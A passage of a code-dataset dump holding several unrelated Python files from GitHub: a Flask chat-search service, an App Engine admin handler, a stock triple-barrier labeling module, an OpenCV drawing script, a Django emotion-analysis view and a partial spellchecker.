\"u\": \"aaa.bb\"\n }\n }\"\"\"\n\n if ret.json().get('ret') and ret.json().get('data',{}).get('u','')+ '@' + ret.json().get('data',{}).get('d','') == user_id:\n if user_domain and ret.json().get('data').get('d') != user_domain:\n return jsonify(ret=False, errcode=500, msg=\"Error domain\")\n # TODO remove this after domain check is soon needless\n elif not user_domain:\n user_domain = ret.json().get('data',{}).get('d')\n res = True\n # user = user_id + '@' + user_domain\n user = user + '@' + user_domain\n\n else:\n search_logger.error(\"ckey api check failed : ret {} u {}\".format(ret.json().get('ret'),user_id)) \n except (requests.RequestException or KeyError) as e:\n search_logger.error(\"ckey api failed : {}\".format(e))\n # TODO notify developer to check\n res, user = check_ckey(ckey)\n except Exception as e:\n search_logger.exception(\"ckey api failed : {}\".format(e))\n else:\n res, user = check_ckey(ckey)\n if res:\n return func(user_id=user, args=__args, *args, **kw)\n else:\n search_logger.info(\"user:{user} login failed, ckey : {ckey}, \\\n \".format(user=user_id, ckey=ckey))\n return jsonify(ret=False, errcode=0, message=\"ckey check failed\")\n return func(user_id=user_id, args=__args, *args, **kw)\n\n wrapper.__name__ = func.__name__\n return wrapper\n\n\n@search_blueprint.route('/search', methods=['GET', 'POST'])\n@authorization\ndef main(user_id, args):\n # 记录每个ip 每次搜索的最后一次请求\n global ip, s_args\n # 对于某些请求时间很长的操作 不进行timeout限制\n extend_time = False\n\n request_ip = request.remote_addr\n if not s_args:\n s_args = args\n if ip != request_ip:\n ip = request_ip\n search_logger.info(ip + ' : \\n{}'.format(json.dumps(s_args, ensure_ascii=False, indent=4)))\n s_args = args\n\n # 将str的action转为二进制 按照define里的定义长度\n if 'platform' in args:\n _group_id = ''\n else:\n _group_id = args.get(\"groupId\", 0)\n action = ''\n if (_group_id or _group_id == '') and 'action' not in args:\n if _group_id == '':\n action = '7'\n elif _group_id == 'Q01':\n action = '1'\n elif _group_id == 'Q02':\n action = '2'\n elif _group_id == 'Q07':\n action = '4'\n elif ('action' not in args) and ('groupId' not in args):\n if args.get('platform','').lower() == 'ios': # 此处等ios兼容后就删掉\n action = '7'\n else:\n return jsonify(ret=False, errcode=500, msg=\"WRONG ACTION\")\n else:\n\n action = args.get(\"action\", 0)\n if int(action) == 63:\n action = 31\n elif int(action) in [1,2,4,6,8,16,32]:\n extend_time = True\n\n try:\n if isinstance(action, str):\n action = format(int(action), \"b\")\n elif isinstance(action, int):\n action = bin(action)\n _register = dict()\n register_len = len(TYPE_REGISTER)\n for _p, _n in enumerate(action[-1: -1 - register_len: -1]):\n _register[TYPE_REGISTER[_p]] = (_n == '1')\n except (KeyError, ValueError, TypeError) as e:\n search_logger.exception(e)\n return jsonify(ret=False, errcode=500, msg=\"WRONG ACTION\")\n\n # 获取相关任务准备进行协程分配\n register = [k for k, v in _register.items() if v is True]\n if_contact = []\n if_lookback = []\n for t in register:\n if t in ACTION_REGISTER['contact']:\n if_contact.append(t)\n if t in ACTION_REGISTER['lookback']:\n if_lookback.append(t)\n\n # 搜索关键词限制\n if if_contact or if_lookback:\n _key = args.get('key', '').strip()\n if len(_key) < 2:\n return jsonify(ret=False, errcode=500, msg=\"key is illegal\")\n elif len(_key) > 20:\n args['key'] = _key[:20]\n else:\n args['key'] = _key\n # TODO 或许要加上剪切提示\n if if_cached:\n redis_util = RedisUtil()\n user_habit = redis_util.get_user_habit(user_id=user_id)\n else:\n user_habit = ''\n data = ''\n if if_contact or if_lookback:\n data = asyncio.run(\n go_coro(if_contact=if_contact, if_lookback=if_lookback, args=args, user=user_id, habit=user_habit, extend_time=extend_time))\n # TODO: data处理\n else:\n search_logger.error(\"NO TASK FOUND ACTION : {}\".format(action))\n\n return jsonify(ret=True, errcode=0, errmsg='', data=data)\n\n\nasync def go_coro(if_contact, if_lookback, args, user, habit, extend_time=False):\n contact = ''\n lookback = ''\n tasks = []\n timeout = 60 if extend_time else 10\n if if_contact:\n contact = Contact(user_id=user, args=args, habit=habit, extend_time=extend_time)\n # 我也不是很懂为啥要把共同群组融进去 于是结构变得有点奇怪 以后看能不能sql搞定吧\n if ('common_muc' in if_contact) or ('muc' in if_contact):\n if ('common_muc' in if_contact) and ('muc' in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=True, common=True))\n tasks.append(t)\n if_contact.remove('muc')\n if_contact.remove('common_muc')\n elif ('common_muc' not in if_contact) and ('muc' in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=True, common=False))\n tasks.append(t)\n if_contact.remove('muc')\n elif ('common_muc' in if_contact) and ('muc' not in if_contact):\n t = asyncio.create_task(contact.router['muc'](user_id=user, origin=False, common=True))\n tasks.append(t)\n if_contact.remove('common_muc')\n else:\n raise BaseException(\"UNEXPECTED IF_CONTACT SITUATION\")\n if if_contact:\n for todo in if_contact:\n t = asyncio.create_task(contact.router[todo](user))\n tasks.append(t)\n if if_lookback:\n lookback = Lookback(user_id=user, args=args, extend_time=extend_time)\n # for todo in if_lookback:\n # t = asyncio.create_task(lookback.router[todo](user))\n # tasks.append(t)\n if 'hs_file' in if_lookback:\n t = asyncio.create_task(lookback.lookback_coro(todo=['hs_file']))\n tasks.append(t)\n if_lookback.remove('hs_file')\n if if_lookback:\n t = asyncio.create_task(lookback.lookback_coro(todo=if_lookback))\n tasks.append(t)\n completed, pending = await asyncio.wait(tasks, timeout=timeout)\n for pen in pending:\n search_logger.error(\"PENDING TASK FOUND {}\".format(pen))\n pen.cancel()\n result = []\n for com in completed:\n # t = com.result()\n if com.result():\n result.append(com.result())\n # sort_key = ['联系人列表', '群组列表', '共同群组', '单人历史', '群组历史', '']\n sort_key = ['联系人', '群组', '聊天记录', '文件', '']\n\n search_logger.debug(\"label {}\".format(result))\n result = sorted(result, key=lambda x: sort_key.index(x.get('groupLabel', '')))\n # 关闭数据库连接\n if contact:\n contact.userlib.close()\n if lookback:\n await lookback.close_conn()\n return result\n","repo_name":"gtouchgogo/qtalk_search","sub_path":"service/search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28334629391","text":"# -*- coding: utf-8 -*-\nimport webapp2\nfrom google.appengine.datastore.datastore_query import Cursor\nfrom google.appengine.ext import ndb\nfrom collections import OrderedDict, Counter\nfrom wtforms import fields\nfrom bp_includes import forms\nfrom bp_includes.lib.basehandler import BaseHandler\n\nfrom bp_includes.models import Group\nimport logging\n\n\nclass AdminGroupListHandler(BaseHandler):\n def get(self):\n p = self.request.get('p')\n q = self.request.get('q')\n c = self.request.get('c')\n forward = True if p not in ['prev'] else False\n cursor = Cursor(urlsafe=c)\n\n if q:\n qry = Group.query(ndb.OR(Group.name == q.lower()))\n else:\n qry = Group.query()\n\n PAGE_SIZE = 50\n if forward:\n groups, next_cursor, more = qry.order(self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)\n if next_cursor and more:\n self.view.next_cursor = next_cursor\n if c:\n self.view.prev_cursor = cursor.reversed()\n else:\n groups, next_cursor, more = qry.order(-self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)\n groups = list(reversed(groups))\n if next_cursor and more:\n self.view.prev_cursor = next_cursor\n self.view.next_cursor = cursor.reversed()\n\n def pager_url(p, cursor):\n params = OrderedDict()\n if q:\n params['q'] = q\n if p in ['prev']:\n params['p'] = p\n if cursor:\n params['c'] = cursor.urlsafe()\n return self.uri_for('admin-groups-list', **params)\n\n self.view.pager_url = pager_url\n self.view.q = q\n\n params = {\n \"list_columns\": [('name', 'Name'),\n ('can_view', 'Can View'),\n ('can_edit', 'Can Edit'),\n ('can_administer', 'Can Adminster'),\n ('can_upload', 'Can Upload'),\n ],\n \"groups\": groups,\n \"count\": qry.count()\n }\n return self.render_template('admin_groups_list.html', **params)\n \n \nclass AdminGroupEditHandler(BaseHandler):\n def get_or_404(self, group_id):\n try:\n group = Group.get_by_id(long(group_id))\n if group:\n return group\n except ValueError:\n pass\n self.abort(404)\n \n def edit(self, group_id=None):\n if group_id:\n group = self.get_or_404(group_id)\n else:\n group = Group() \n\n if self.request.POST:\n if self.form.validate():\n self.form.populate_obj(group)\n group.put()\n self.add_message(\"Changes saved!\", 'success')\n import time\n time.sleep(1)\n #return self.redirect_to(\"admin-groups-list\", group_id=group_id)\n return self.redirect('/admin/groups/')\n else:\n self.add_message(\"Could not save changes!\", 'danger')\n else:\n self.form.process(obj=group)\n pass\n \n for field in self.form:\n logging.info(field)\n \n\n params = {\n 'group': group\n } \n return self.render_template('admin_group_edit.html', **params)\n\n @webapp2.cached_property\n def form(self):\n f = forms.EditGroupForm(self)\n return f","repo_name":"govtmirror/KS-2014","sub_path":"Upload_mod/bp_admin/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69930025447","text":"\"\"\"\nData Labeling methode\nReference: https://towardsdatascience.com/the-triple-barrier-method-251268419dcd\n\"\"\"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_barriers_out(barriers, filename):\n plt.style.use('seaborn')\n plt.rcParams['figure.figsize'] = [16, 9]\n plt.rcParams['figure.dpi'] = 300\n plt.rcParams['font.size'] = 20\n plt.rcParams['axes.labelsize'] = 20\n plt.rcParams['axes.titlesize'] = 24\n plt.rcParams['xtick.labelsize'] = 16\n plt.rcParams['ytick.labelsize'] = 16\n plt.rcParams['font.family'] = 'serif'\n\n plt.plot(barriers.out, 'bo')\n\n plt.savefig(filename + '.png')\n plt.clf()\n\ndef plot_barriers_dynamic(barriers, t_final, filename):\n fig, ax = plt.subplots()\n ax.set(title='stock price', xlabel='date', ylabel='price')\n ax.plot(barriers.price[100: 200])\n start = barriers.index[120]\n end = barriers.vert_barrier[120]\n upper_barrier = barriers.top_barrier[120]\n lower_barrier = barriers.bottom_barrier[120]\n ax.plot([start, end], [upper_barrier, upper_barrier], 'r--')\n ax.plot([start, end], [lower_barrier, lower_barrier], 'r--')\n ax.plot([start, end], [(lower_barrier + upper_barrier) * 0.5,\n (lower_barrier + upper_barrier) * 0.5], 'r--')\n ax.plot([start, start], [lower_barrier, upper_barrier], 'r-')\n ax.plot([end, end], [lower_barrier, upper_barrier], 'r-')\n\n fig.savefig(filename + '_1.png')\n\n # dynamic graph\n fig, ax = plt.subplots()\n ax.set(title='Apple stock price',\n xlabel='date', ylabel='price')\n ax.plot(barriers.price[100: 200])\n start = barriers.index[120]\n end = barriers.index[120 + t_final]\n upper_barrier = barriers.top_barrier[120]\n lower_barrier = barriers.bottom_barrier[120]\n ax.plot(barriers.index[120:120 + t_final + 1], barriers.top_barrier[start:end], 'r--')\n ax.plot(barriers.index[120:120 + t_final + 1], barriers.bottom_barrier[start:end], 'r--')\n ax.plot([start, end], [(lower_barrier + upper_barrier) * 0.5,\n (lower_barrier + upper_barrier) * 0.5], 'r--')\n ax.plot([start, start], [lower_barrier, upper_barrier], 'r-')\n ax.plot([end, end], [barriers.bottom_barrier[end], barriers.top_barrier[end]], 'r-')\n\n fig.savefig(filename + '_2.png')\n\n# for intraday data\ndef get_daily_volatility_for_intraday_data(close,span0=100):\n # daily vol, reindexed to close\n df0=close.index.searchsorted(close.index-pd.Timedelta(days=1))\n df0=df0[df0>0]\n a = df0 -1 #using a variable to avoid the error message.\n df0=pd.Series(close.index[a], index=close.index[close.shape[0]-df0.shape[0]:])\n df0=close.loc[df0.index]/close.loc[df0.values].values-1\n # daily returns\n df0=df0.ewm(span=span0).std()\n return df0\n\n# for daily data\ndef get_daily_volatility_for_daily_data(close,span0=20):\n # simple percentage returns\n df0=close.pct_change()\n # 20 days, a month EWM's std as boundary\n df0=df0.ewm(span=span0).std()\n df0.dropna(inplace=True)\n return df0\n\ndef get_3_barriers(prices, high, low, daily_volatility, t_final, upper_lower_multipliers):\n #create a container\n barriers = pd.DataFrame(columns=['days_passed', 'price', 'high', 'low', 'vert_barrier', 'top_barrier', 'bottom_barrier'],\n index = daily_volatility.index)\n for day, vol in daily_volatility.iteritems():\n days_passed = len(daily_volatility.loc[daily_volatility.index[0] : day])\n #set the vertical barrier\n if (days_passed + t_final < len(daily_volatility.index) and t_final != 0):\n vert_barrier = daily_volatility.index[days_passed + t_final]\n else:\n # Labeling with nan ending\n vert_barrier = np.nan\n decreasing = False\n if decreasing:\n # Labeling with decreasing ending\n vert_barrier = daily_volatility.index[len(daily_volatility.index) - 1]\n #set the top barrier\n if upper_lower_multipliers[0] > 0:\n top_barrier = prices.loc[day] + prices.loc[day] * upper_lower_multipliers[0] * vol\n else:\n #set it to NaNs\n top_barrier = pd.Series(index=prices.index)\n #set the bottom barrier\n if upper_lower_multipliers[1] > 0:\n bottom_barrier = prices.loc[day] - prices.loc[day] * upper_lower_multipliers[1] * vol\n else:\n #set it to NaNs\n bottom_barrier = pd.Series(index=prices.index)\n\n barriers.loc[day, ['days_passed', 'price', 'high', 'low', 'vert_barrier','top_barrier', 'bottom_barrier']] = days_passed, prices.loc[day], high.loc[day], low.loc[day], vert_barrier, top_barrier, bottom_barrier\n\n barriers['out'] = None\n return barriers\n\n\ndef get_labels(barriers, label_below=0, label_middle=1, label_above=2, use_high_low=False):\n '''\n start: first day of the window\n end:last day of the window\n price_initial: first day stock price\n price_final:last day stock price\n top_barrier: profit taking limit\n bottom_barrier:stop loss limt\n condition_pt:top_barrier touching conditon\n condition_sl:bottom_barrier touching conditon\n '''\n floating = False\n for i in range(len(barriers.index)):\n start = barriers.index[i]\n end = barriers.vert_barrier[i]\n if pd.notna(end):\n # assign the top and bottom barriers\n top_barrier = barriers.top_barrier[i]\n bottom_barrier = barriers.bottom_barrier[i]\n #set the profit taking and stop loss conditons\n if use_high_low == True:\n high_price = barriers.high[start: end].copy()\n low_price = barriers.low[start: end].copy()\n else:\n high_price = barriers.price[start: end].copy()\n low_price = barriers.price[start: end].copy()\n\n condition_pt = (high_price >= top_barrier).any()\n condition_sl = (low_price <= bottom_barrier).any()\n #set the first to reach the barrier\n if condition_pt and condition_sl:\n cpt_date = barriers.index[i]\n condition_pt_loc = False\n j=1\n while (cpt_date <= end) and (condition_pt_loc == False):\n if(high_price[cpt_date] >= top_barrier):\n condition_pt_loc = cpt_date\n else:\n cpt_date = barriers.index[i+j]\n j=j+1\n cpt_date = barriers.index[i]\n condition_sl_loc = False\n j=1\n while (cpt_date <= end) and (condition_sl_loc == False):\n if(low_price[cpt_date] <= bottom_barrier):\n condition_sl_loc = cpt_date\n else:\n cpt_date = barriers.index[i+j]\n j=j+1\n if condition_pt_loc < condition_sl_loc:\n condition_sl = False\n else:\n condition_pt = False\n #assign the labels\n if condition_pt:\n barriers['out'][i] = label_above\n elif condition_sl:\n barriers['out'][i] = label_below\n else:\n if not floating:\n barriers['out'][i] = label_middle\n else:\n price_initial = barriers.price[start]\n price_final = barriers.price[end]\n barriers['out'][i] = max([(price_final - price_initial) / (top_barrier - price_initial),\n (price_final - price_initial) / (price_initial - bottom_barrier)],\n key=abs)\n return barriers\n\ndef is_in_half_brackets(df, limit_high, limit_low):\n if ((df.out.sum() <= limit_high) and (df.out.sum() >= limit_low)):\n return True\n else:\n return False\n\ndef is_over_brackets(df, limit_high):\n if (df.out.sum() >= limit_high):\n return True\n else:\n return False\n\ndef is_under_brackets(df, limit_low):\n if (df.out.sum() <= limit_low):\n return True\n else:\n return False\n\ndef get_balanced_upper_multiplier(prices, highs, lows,\n daily_volatility, t_final,\n upper_multiplier, lower_multiplier,\n label_below, label_middle, label_above, use_high_low):\n min_max_range = 0.5 # Range between the max upper_multiplier and min upper_multiplier\n coef_threshold = 0.001 # Balance +/- coef precision\n \n upper_multiplier_max = upper_multiplier + upper_multiplier * min_max_range\n upper_multiplier_min = upper_multiplier - upper_multiplier * min_max_range\n high_threshold = int(len(prices) * 0.5 + len(prices) * coef_threshold)\n low_threshold = int(len(prices) * 0.5 - len(prices) * coef_threshold)\n\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_max, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if is_in_half_brackets(barriers, high_threshold, low_threshold):\n return barriers\n else:\n if is_over_brackets(barriers, high_threshold):\n # upper_multiplier over boundaries\n return barriers\n\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_min, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if is_in_half_brackets(barriers, high_threshold, low_threshold):\n return barriers\n else:\n if is_under_brackets(barriers, low_threshold):\n # upper_multiplier under boundaries\n return barriers\n while True:\n upper_multiplier_step = upper_multiplier_min + (upper_multiplier_max - upper_multiplier_min) * 0.5\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier_step, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above, use_high_low)\n\n if is_in_half_brackets(barriers, high_threshold, low_threshold):\n print(\"Upper multiplier coef: \",upper_multiplier_step)\n return barriers\n else:\n if is_under_brackets(barriers, low_threshold):\n upper_multiplier_max = upper_multiplier_step\n else:\n upper_multiplier_min = upper_multiplier_step\n\ndef data_labeling(df, params = None):\n debug = False\n t_final = 10 # how many days we hold the stock which set the vertical barrier\n upper_multiplier = 2\n lower_multiplier = 2\n label_below = 0\n label_middle = 1\n label_above = 2\n use_balanced_upper_multiplier = False\n use_high_low = False\n if params:\n debug = params.get('labeling_debug', debug)\n t_final = params.get('labeling_t_final', t_final)\n if isinstance(t_final, str):\n t_final = int(t_final)\n upper_multiplier = params.get('labeling_upper_multiplier', upper_multiplier)\n if isinstance(upper_multiplier, str):\n upper_multiplier = float(upper_multiplier)\n lower_multiplier = params.get('labeling_lower_multiplier', lower_multiplier)\n if isinstance(lower_multiplier, str):\n lower_multiplier = float(lower_multiplier)\n label_below = params.get('labeling_label_below', label_below)\n if isinstance(label_below, str):\n label_below = float(label_below)\n label_middle = params.get('labeling_label_middle', label_middle)\n if isinstance(label_middle, str):\n label_middle = float(label_middle)\n label_above = params.get('labeling_label_above', label_above)\n if isinstance(label_above, str):\n label_above = float(label_above)\n use_balanced_upper_multiplier = params.get('use_balanced_upper_multiplier', use_balanced_upper_multiplier)\n if isinstance(use_balanced_upper_multiplier, str):\n use_balanced_upper_multiplier = bool(use_balanced_upper_multiplier)\n use_high_low = params.get('use_high_low', use_high_low)\n if isinstance(use_high_low, str):\n use_high_low = bool(use_high_low)\n\n price = df[\"close\"].copy()\n high = df[\"high\"].copy()\n low = df[\"low\"].copy()\n\n #set the boundary of barriers, based on 20 days EWM\n daily_volatility = get_daily_volatility_for_daily_data(price)\n\n #align the index\n prices = price[daily_volatility.index]\n highs = high[daily_volatility.index]\n lows = low[daily_volatility.index]\n\n if use_balanced_upper_multiplier:\n # Find optimized upper_multiplier coef in order to get balanced labeling feature\n barriers = get_balanced_upper_multiplier(prices, highs, lows,\n daily_volatility, t_final,\n upper_multiplier, lower_multiplier,\n label_below, label_middle, label_above, use_high_low)\n else:\n barriers = get_3_barriers(prices, highs, lows, daily_volatility, t_final, [upper_multiplier, lower_multiplier])\n barriers = get_labels(barriers, label_below, label_middle, label_above)\n\n if debug:\n plot_barriers_out(barriers, filename=\"./test/generated/labeling_barriers_out\")\n plot_barriers_dynamic(barriers, t_final, filename=\"./test/generated/labeling_barriers_dynamic\")\n barriers.to_csv(\"./test/generated/labeling_barriers.csv\")\n\n df[\"labeling\"] = barriers['out'].copy()\n \n return df\n","repo_name":"cedfactory/fdp","sub_path":"src/indicators_flabeling.py","file_name":"indicators_flabeling.py","file_ext":"py","file_size_in_byte":13674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5686263202","text":"T = int(input())\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\nfor test_case in range(1, T + 1):\n count = 0\n data = list(str(test_case))\n for i in data :\n if(i==\"3\")or(i==\"6\")or(i==\"9\") :\n count += 1\n if(count>=1) :\n print(\"-\"*count,end=' ')\n else :\n print(test_case,end=' ')\n","repo_name":"woodypef/tolife","sub_path":"SWEA/D2/[1926]간단한369게임.py","file_name":"[1926]간단한369게임.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38156419305","text":"from django.urls import path\n\nfrom animal_lib.articles.views import ArticleListView, DraftListView, CreateArticleView, EditArticleView, DetailArticleView\nfrom animal_lib.articles.forms import ArticleForm\napp_name = 'articles'\n\nurlpatterns = [\n path(\"\", ArticleListView.as_view(), name=\"list\"),\n path(\"write-new-article/\", CreateArticleView.as_view(form_class=ArticleForm, template_name=\"articles/article_create.html\"), name=\"write_new\"),\n path(\"articles/drafts/\", DraftListView.as_view(), name=\"drafts\"),\n path(\"articles/edit//\", EditArticleView.as_view(), name=\"edit_article\"),\n path(\"articles//\", DetailArticleView.as_view(), name=\"article\"),\n]\n","repo_name":"John-Boland/animal_lib","sub_path":"animal_lib/articles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14196274638","text":"from django.shortcuts import render, redirect\nfrom miniProject.models import Thought\nfrom random import randint\nfrom datetime import datetime\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport pickle\nimport os\n\ndef removeStopwords(text):\n tokens = word_tokenize(text)\n cleaned = [token for token in tokens if token not in stopwords.words('english')]\n return \" \".join(cleaned)\n\n# Create your views here\n\ndef home(request):\n return render(request, 'layout.html')\n\ndef project(request):\n context = {\n 'img' : randint(1,4),\n }\n if request.method == 'POST':\n thoughts = request.POST.get('thts')\n tht = Thought(thoughts = thoughts)\n tht.save()\n return redirect('/analysis')\n return render(request, 'start.html', context)\n\ndef analysis(request):\n text = Thought.objects.order_by('id')[len(Thought.objects.order_by('id'))-1].thoughts\n cleaned_text = removeStopwords(text)\n\n here = os.path.dirname(os.path.abspath(__file__))\n filename = os.path.join(here, 'lr.pkl')\n lrmodel = pickle.load(open(filename, 'rb'))\n filename = os.path.join(here, 'vectorizer.pkl')\n vectorizer = pickle.load(open(filename,'rb'))\n vector = vectorizer.transform([cleaned_text])\n\n dct = dct = dict(zip(lrmodel.classes_,lrmodel.predict_proba(vector)[0]*100))\n for i in dct:\n dct[i] = str(round(dct[i],2))+'%'\n\n context = {\n 'bruh' : cleaned_text,\n 'prime_emotion' : change_emotion_form(lrmodel.predict(vector)[0]),\n 'emotions' : dct,\n }\n return render(request, 'analysis.html', context)\n\n\n# UTILITY MEHTODS\n\ndef change_emotion_form(emotion):\n dct = {\n 'fear' : 'scared',\n 'anger' : 'angry',\n 'joy' : 'happy',\n 'surprise' : 'surprised',\n 'sadness' : 'sad',\n 'love' : 'in love'\n }\n return dct[emotion]\n","repo_name":"GodaKartik/Emotion-Analyser","sub_path":"miniProject/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70077534570","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 3 09:44:07 2022\n\n@author: tosun\n\"\"\"\n\n\"\"\"for i in dir(cv2):\n if 'EVENT' in i:\n print(i)\"\"\"\n\nimport cv2\nimport numpy as np\n\ncizim = False\nmod = False\nxi,yi = -1,-1 #Baslangic koordinat\n\ndef draw(event,x,y,flags,param):\n #print(x,y) #Farenin gezdigi yerde koordinatlari yazar.\n \"\"\"if event == cv2.EVENT_LBUTTONDBLCLK: #Cift tiklanirsa\n cv2.circle(img,(x,y),50,(255,0,0),-1) #Tiklanan yere daire cizer.\"\"\"\n \n global cizim\n global xi,yi,mod\n \n if event == cv2.EVENT_LBUTTONDOWN: #Mouse'a basildigi surece\n xi,yi = x,y\n cizim = True\n elif event == cv2.EVENT_MOUSEMOVE: #Mouse'a hareket ettirrilirse\n if cizim == True:\n if mod: \n cv2.circle(img,(x,y),5,(100,50,0),-1)\n else:\n cv2.rectangle(img,(xi,yi),(x,y),(0,0,255),-1)\n else:\n pass\n elif event == cv2.EVENT_LBUTTONUP: #Mouse birakilirsa\n cizim = False\n if mod: \n cv2.circle(img,(x,y),5,(100,50,0),-1)\n else:\n cv2.rectangle(img,(xi,yi),(x,y),(0,0,255),-1)\n \n\nimg = np.ones((512,512,3),np.uint8)\n\ncv2.namedWindow(\"paint\")\n\ncv2.setMouseCallback(\"paint\",draw)\n\nwhile(1):\n cv2.imshow(\"paint\",img)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n break\n if cv2.waitKey(1) & 0xFF == ord(\"m\"):\n mod = not mod\n \ncv2.destroyAllWindows()\n\n\n","repo_name":"tosunersevde/OpenCv-Egitim-Ornekleri","sub_path":"udemy_opencv_fare_olaylari.py","file_name":"udemy_opencv_fare_olaylari.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74571727527","text":"\n\ndef read_file(file):\n file = open(file)\n file = file.read().split('\\n')\n return file\n\n\ndef file_to_dict(file):\n file = read_file(file)\n i = 0\n while i < len(file):\n file[i] = file[i].split(',')\n i += 1\n file.pop()\n words = dict()\n for item in file:\n words[item[0]] = item[1]\n return (words)\n\n\ndef keyboard_file_to_dict(file):\n file = read_file(file)\n i = 0\n while i < len(file):\n file[i] = file[i].split(' ')\n i += 1\n replace = dict()\n i = 0\n while i < len(file):\n j = 1\n keys = []\n while j < len(file[i]):\n keys.append(file[i][j])\n j += 1\n replace[file[i][0]] = keys\n i += 1\n return (file)\n\n\ndef file_to_list(file):\n file = read_file(file)\n file = list(file)\n if '' in file:\n file.remove('')\n return (file)\n\n\n\n\ndef found(listfile, dictionary, indexlist):\n i = 0\n while i < len(listfile):\n indexlist.append(0)\n if listfile[i] in dictionary:\n indexlist[i] = 1\n i += 1\n return listfile, indexlist\n\n\ndef drop(listfile, dictionary, indexlist, wordfre):\n i = 0\n while i < len(listfile):\n if indexlist[i] != 1:\n j = 0\n for charecter in listfile[i]:\n newlistfile = listfile[i][:j] + listfile[i][j+1:]\n if newlistfile in dictionary:\n wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n if indexlist == 0:\n indexlist[i] = 2\n else:\n indexlist[i] += 1\n j += 1\n i += 1\n return listfile, indexlist\n\n\ndef swap(listfile, dictionary, indexlist):\n i = 0\n while i < len(listfile):\n if indexlist[i] != 1:\n j = 0\n for charecter in listfile[i]:\n if j == 0:\n newlistfile = listfile[i][1] + listfile[i][0] + listfile[i][2:]\n elif j == len(listfile[1]):\n newlistfile = listfile[i][:j-1] + listfile[i][j] + listfile[i][j-1]\n else:\n newlistfile = listfile[i][:j-1] + listfile[i][j] + listfile[i][j-1] + listfile[i][j+1:]\n if newlistfile in dictionary:\n wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n if indexlist[i] == 0:\n indexlist[i] = 2\n else:\n indexlist[i] += 1\n j += 1\n i += 1\n return listfile, indexlist\n\n\n\ndef replace(listfile, dictionary, indexlist, keyboard):\n i = 0\n while i < len(listfile):\n if indexlist[i] != 1:\n j = 0\n for charecter in listfile[i]:\n a = 0\n if charecter == ' ':\n charecter = ''\n while a < len(keyboard[charecter]):\n newlistfile = listfile[i][:j] + keyboard[charecter][a] + listfile[i][j+1:]\n if newlistfile in dictionary:\n wordfre[listfile[i]].append((dictionary[newlistfile], newlistfile))\n if indexlist[i] == 0:\n indexlist = 2\n else:\n indexlist[i] += 1\n a += 1\n j += 1\n i += 1\n return listfile, indexlist\n\n\n\n\n\n\n\"\"\"\ndictionary = input('Dictionary => ')\nprint(dictionary)\nlistfile = input('Input file => ')\nprint(listfile)\nkeyboard = input('Keyboard file =. ')\nprint(keyboard)\n\"\"\"\ndictionary = 'words_10percent.txt'\nlistfile = 'input_words.txt'\nkeyboard = 'keyboard.txt'\n\n\ndictionary = file_to_dict(dictionary)\nlistfile = file_to_list(listfile)\nkeyboard = keyboard_file_to_dict(keyboard)\n\n\noldlistfile = list(listfile)\n\nindexlist = []\n\nwordfre = dict()\n\nfor i in range(len(listfile)):\n wordfre[listfile[i]] = list()\n\nlistfile, indexlist = found(listfile, dictionary, indexlist)\nlistfile, indexlist = drop(listfile, dictionary, indexlist, wordfre)\nlistfile, indexlist = swap(listfile, dictionary, indexlist)\nlistfile, indexlist = replace(listfile, dictionary, indexlist, keyboard)\n\n\n\nspecial = []\nfor word in wordfre:\n wordfre[word] = set(wordfre[word])\n wordfre[word] = list(wordfre[word])\n wordfre[word] = sorted(wordfre[word])\n special.append(len(wordfre[word]))\n\n\nprint('Spellcheck results:')\ni = 0\nwhile i < len(listfile):\n if special[i] < indexlist[i]:\n indexlist[i] = special[i]\n if indexlist[i] == 0:\n index = 'NO MATCH'\n elif indexlist[i] == 1:\n index = 'FOUND'\n \n if indexlist[i] < 2:\n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], listfile[i], index))\n elif indexlist[i] == 2:\n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n elif indexlist[i] == 3: \n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-2][1], 'MATCH 2'))\n elif indexlist[i] == 4: \n print('{0:15} -> {1:15} :{2}'.format(oldlistfile[i], wordfre[oldlistfile[i]][-1][1], 'MATCH 1'))\n 